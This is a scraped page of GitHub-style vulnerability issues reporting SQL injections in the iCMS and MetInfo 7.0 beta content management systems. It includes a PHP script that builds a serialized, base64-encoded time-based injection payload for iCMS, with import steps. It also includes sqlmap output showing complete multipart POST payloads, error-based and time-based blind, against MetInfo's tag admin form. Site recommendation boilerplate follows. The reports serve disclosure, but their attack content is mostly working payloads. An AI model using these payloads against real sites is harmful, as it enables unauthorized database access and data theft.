cve-test's Introduction
cve-test's People
cve-test's Issues
There is a SQL injection in spider_project.admincp.php of iCMS
The cause of the vulnerability is similar to issus 59
But the payload need a Two-dimensional array, which is different from the previous one.
<?php
$arr = array("key" => array("name" => "test' or sleep(5) or '"));
$ser_arr = serialize($arr);
$ser_b64 = base64_encode($ser_arr);
echo $ser_b64;
?>
Step:
- save the payload output in an txt file.
- import the file as scheme
- see the different from the return time
MetInfo7.0 beta后台注入
Vulnerability Name: Metinfo CMS Background SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip
Version: V7.0.0 beta
web can see the web application uses gpc to filter variables in the form.
code in app/system/entrance.php:71
but the developers use the get_sql function for secondary filtering, causing escape single quotes.
code in app/system/tags/admin/index.class.php:171
payload
attack with sqlmap
Multipart-like data found in POST data. Do you want to process it? [Y/n/q]
[18:25:17] [INFO] resuming back-end DBMS 'mysql'
[18:25:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART title ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"
test' WHERE 5805=5805 AND (SELECT 3007 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3007=3007,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aAqw
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"
sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"
4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"
save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"
test' WHERE 2052=2052 AND SLEEP(5)-- YLsI
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"
sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"
test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"
0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"
4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"
save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--
---
[18:25:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.0
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.